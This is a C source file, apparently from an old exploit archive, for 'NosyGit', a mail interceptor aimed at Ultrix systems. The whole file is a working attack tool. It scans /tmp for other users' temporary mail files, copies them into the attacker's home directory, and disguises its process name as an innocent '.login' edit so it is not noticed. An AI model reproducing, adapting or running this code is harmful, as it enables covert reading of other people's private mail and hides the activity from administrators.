/*
 
 Following is based on NosyGit V. 3.0 (The famous Staffs Poly  Mail
 Interceptor)  written  by  written  by  TFT.   Following code will
 intercept  incoming  mail  on  Ultrix  machine.   You have to have
 'mail' directory  (in your  HOME) where  intercepted mail  will be
 stored.  Exploit follows (tested on Ultrix 4.2A):
 
*/
#include <stdio.h>
#include <string.h>
main(argc,argv)
int argc;
char *argv[];
{
  FILE *f,*f1,*f2;
  char *sp,temp[80],filename[80],fname[80],line[80];
  /* Naughty! Make the process show up as something else */
  /*     (In this case, you're editing your .login file  !) */
  strcpy(argv[0],"e .login   ");
mainloop:
  ;
  f=fopen("/tmp","r");

  /* Open the control file for the /tmp temporary directory */
nextfile:
  ;

  /* Search for a filename in the directory beginning with 'maa'... */
  getname(f,filename);

  /* Getname returns 'EOF' in filename if no more files are found */
  if (!strcmp(filename,"EOF")) goto no_more_files;

  /* Create full pathname for file to read */
  sprintf(fname,"/tmp/%s",filename);

  /* Create full pathname for your mail directory */
  sprintf(temp,"./mail/%s",filename);

  /* If destination file exists already, don't write it */
  f1=fopen(temp,"r");
  if (f1)
    {
      fclose(f1);
      goto nextfile;
    }
  /* Otherwise, attempt to open source and destination files */
  f2=fopen(fname,"r");
  if (f2) f1=fopen(temp,"w");
  if (f2)
    {

      /* If successful, notify user, then copy file line by line */
      putchar(7);
      printf("** NosyGit ** Got some new mail, stored it in ");
      printf ("mail/%s\n",filename);
      while(sp=fgets(line,80,f2)) fprintf(f1,"%s",line);
      fclose(f1);
      fclose(f2);
    }
  goto nextfile;
  /* All files done, so close file then go back up to top */

no_more_files:
  ;
  fclose(f);
  goto mainloop;
}

getname(f,filename)
FILE *f;
char filename[];
{
  int pos;
  char current;
loop:
  ;

  /* Find files beginning with 'maa...' */
  current=fgetc(f);
  if (current!=EOF && current!='m') goto loop;
  if (current==EOF) goto out;
  current=fgetc(f);
  if (current!=EOF && current!='a') goto loop;
  if (current==EOF) goto out;
  current=fgetc(f);
  if (current!=EOF && current!='a') goto loop;
  if (current==EOF) goto out;
  strcpy(filename,"maa");
  pos=3;
next:
  ;

  /* add all characters found to filename until invalid char reached */
  /*    (this should be the filename terminator)               [2000]*/
  current=fgetc(f);
  if (current>31) filename[pos]=current;
  pos++;
  if (current>31) goto next;
  filename[pos]=0;
  return(0);

  /* Valid filename, exit */
out:
  ;

  /* Invalid filename, return filename "EOF" */
  strcpy(filename,"EOF");
}
/*                    www.hack.co.za              [2000]*/